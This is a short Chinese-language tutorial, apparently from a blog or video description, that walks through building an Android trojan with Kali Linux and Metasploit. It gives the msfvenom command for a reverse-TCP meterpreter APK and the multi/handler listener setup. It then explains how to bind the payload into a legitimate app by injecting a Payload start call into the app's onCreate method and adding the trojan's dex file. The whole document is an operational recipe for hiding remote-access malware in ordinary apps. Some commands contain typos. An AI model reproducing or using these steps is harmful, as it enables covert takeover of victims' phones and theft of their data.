手把手保姆级教你kaliMSFapk木马制作和捆绑

第1步-获取本机ip：

ifconfig

第2步-进入kali：

nh

第3步-打开MSF：

msfconsole

第4步-制作木马：

msfvenom -p android/meterpreter/reverse_tcp lhost=输入本机ip lport=随便输入一个大于1023没有被占用的端口 R > /home/kali/随便一个英文名字.apk

比如：msfvenom -p android/meterpeter/reverse_tcplhost=192.168.0.0 lport=4090 R > /home/kali/jjb.apk

第5步-MSF打开监听程序：

use exploit/multi/handler

第6步-设置Payload攻击：

set payload android/meterpreter/reverse_tcp

第7步-查看模块配置（可以不做）：

options

第8步-设置ip：

set lhost 192.168.0.0第4步lhost=输入的哪个ip第8步set lhost 这里就输入哪个ip

第9步-设置端口：

set lport 4090第4步lport=输入哪个端口第9步set lport 就输入哪个端口

第10步-运行攻击：

run

捆绑：

在准备捆绑的软件的AndroidManifest.xm文件中找到金色文字application代码下的activity代码下的android:nmae=因为每个软件除了我说的的代码之外的代码有些不同可以参照我选的这些字和话去找，找到后复制android:name=引号中的代码也就是图片中的com.unity3d.player.UnityPlayerActivity

在准备捆绑的软件里的.dex文件中搜索我们刚刚复制的代码然后在这个代码中搜索onCreate然后在.method protected onCreate(Landroid/osBundle;)V代码下添加invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V代码

之后保存退出准备捆绑的软件文件界面，然后找到我们生成的木马中的.dex文件添加到准备捆绑木马的软件中，如果准备捆绑木马的文件中已经有classes1.dex classes2.dex文件我们就把木马的.dex文件前面加个3如:classes3.dex以此类推

B站详细教程：BV1Pw7u6yEdd